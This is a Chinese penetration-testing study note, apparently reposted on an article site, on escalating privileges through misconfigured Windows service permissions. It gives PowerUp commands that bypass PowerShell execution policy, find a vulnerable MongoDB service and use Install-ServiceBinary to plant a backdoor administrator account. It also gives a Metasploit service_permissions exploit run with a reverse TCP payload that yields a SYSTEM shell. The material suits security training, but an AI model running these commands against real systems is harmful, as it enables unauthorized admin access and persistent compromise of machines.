美文网首页内网学习笔记
【内网学习笔记】15、系统服务权限配置不当利用

【内网学习笔记】15、系统服务权限配置不当利用

作者: TeamsSix | 来源:发表于2021-07-22 18:00 被阅读0次

PowerUp

PowerUp 可以用来寻找目标中权限配置不当的服务,下载地址:https://github.com/PowerShellEmpire/PowerTools/blob/master/PowerUp/PowerUp.ps1

在 PowerShell 中导入并执行脚本

Import-Module .\PowerUp.ps1
Invoke-AllChecks

如果 PowerShell 由于处在受限模式以至于无法导入脚本,可以使用以下命令绕过。

powershell.exe -exec bypass -command "&{Import-Module .\PowerUp.ps1;Invoke-AllChecks}"

PS C:\Users\teamssix\Desktop> powershell.exe -exec bypass -command "&{Import-Module .\PowerUp.ps1;Invoke-AllChecks}"

[*] Running Invoke-AllChecks

[*] Checking if user is in a local group with administrative privileges...
[+] User is in a local group that grants administrative privileges!
[+] Run a BypassUAC attack to elevate privileges to admin.

[*] Checking for unquoted service paths...

[*] Checking service executable and argument permissions...

ServiceName    : MongoDB
Path           : C:\Web\mongodb\bin\mongod.exe --auth --config C:\Web\mongodb\mongod.conf --s
                 ervice
ModifiableFile : C:\Web\mongodb\mongod.conf
StartName      : LocalSystem
AbuseFunction  : Install-ServiceBinary -ServiceName 'MongoDB'

由于结果可能比较长,因此也可以将其保存到 txt 文件里,方便查看

powershell.exe -exec bypass -command "&{Import-Module .\PowerUp.ps1;Invoke-AllChecks | Out-File -Encoding ASCII result.txt}"

从检查的结果可以看出 MongoDB 服务存在漏洞,利用 Install-ServiceBinary 模块,通过 PowerUp 利用该处权限配置不当添加管理员用户。

powershell.exe -exec bypass -command "&{Import-Module .\PowerUp.ps1;Install-ServiceBinary -ServiceName 'MongoDB' -UserName test -Password Passw0rd}"

PS C:\Users\teamssix\Desktop> powershell.exe -exec bypass -command "&{Import-Module .\PowerUp.ps1;Install-ServiceBinary -ServiceName 'MongoDB' -UserName test -Password Passw0rd}"

ServiceName                   ServicePath                   Command                       BackupPath
-----------                   -----------                   -------                       ----------
MongoDB                       C:\Web\mongodb\bin\mongod...  net user test Passw0rd /ad... C:\Web\mongodb\bin\mongod...

重启系统,查看用户,发现 test 已经被添加到管理员组了。

PS C:\Users\teamssix\Desktop> net user test
用户名                 test
全名
……
本地组成员             *Administrators       *Users
全局组成员             *None
命令成功完成。

Metasploit

在 MSF 中,先看下已上线主机的权限

meterpreter > getuid
Server username: TEAMSSIX\dev

MSF 中对应服务权限配置不当的利用模块是 exploit/windows/local/service_permissions

利用步骤如下:

use exploit/windows/local/service_permissions
set payload windows/meterpreter/reverse_tcp
set lhost 192.168.7.1
set lport 4444
set session 1
run
image

可以看到会话直接被提升到了 SYSTEM 权限。

原文链接:
https://teamssix.com/year/210722-173157.html

参考文章:

https://evi1cg.me/archives/Powerup.html

相关文章

  • 【内网学习笔记】15、系统服务权限配置不当利用

    PowerUp PowerUp 可以用来寻找目标中权限配置不当的服务,下载地址:https://github.co...

  • 任务13:利用配置不当提权

    注:本笔记来自安全牛课堂,感谢倪群主,感谢苑老师! 利用管理员对服务器权限配置不当来提权。 当我们在目标上发现目标...

  • 内网安全-记一次内网靶机渗透

    所涉及到的知识点: 1、WEB安全-漏洞发现及利用2、系统安全-权限提升(漏洞&配置&逃逸)3、内网安全-横向移动...

  • 2021-12-24 nps的安装和使用

    云服务1台内网机1台 云服务是购买的华为云,配置是1C2G,操作系统CentOS7.6,用于nps的服务端。 内网...

  • 权限相关的测试方法

    1. 在权限系统中配置权限 2. 让RD配合测试 3. 可以利用抓包工具,修改权限

  • CENTOS6下squid安装配置

    公司内网限速怎么办?若你满足如下条件,则可以通过squid简单配置实现高速上网. 你有服务器权限; 服务器没有限速...

  • Ubuntu18 LTS 安装配置 DNS 服务器

    本文实现Linux Ubuntu18系统上实现内网配置DNS服务器 一、安装DNS服务器 $ sudo apt-g...

  • keepalived配置方法

    配置VIP 先解释下以下步骤中的几个变量(默认使用root权限) $node1: 服务器A的内网IP $node2...

  • 内网系统权限设计

    需求背景 鉴于公司内网系统繁多,员工需要针对不同系统进行不同职责划分,由此产生内网系统权限统一设计需求。 设计思路...

  • frp内网穿透

    frp内网穿透 阿里云服务器 CentOS系统 frp项目地址 服务器端 安装并配置frps 编辑frps.ini...

网友评论

    本文标题:【内网学习笔记】15、系统服务权限配置不当利用

    本文链接:https://www.haomeiwen.com/subject/kllymltx.html

    延伸阅读

    深度阅读

    • 您也可以注册成为美文阅读网的作者,发表您的原创作品、分享您的心情!

    栏目导航

    热点阅读

    内网学习笔记

    关于我们|服务条款|联系我们|【内网学习笔记】15、系统服务权限配置不当利用|投稿指南|网站地图|RSS订阅|排版工具|手机版

    提供经典美文摘抄,优美散文欣赏,现代诗歌精选,短篇小说,心情随笔,表白情书范文,故事会在线阅读欣赏

    Copyright © 2014-2023 Haomeiwen.com All Rights Reserved. 好美文阅读网 版权所有

    备案信息:桂公网安备 45052102000051号 · 桂ICP备13007215号-3

    本站所收录作品、热点评论等信息部分来源互联网,目的只是为了系统归纳学习和传递资讯

    所有作品版权归原创作者所有,与本站立场无关,如不慎侵犯了你的权益,请联系我们告知,我们将做删除处理!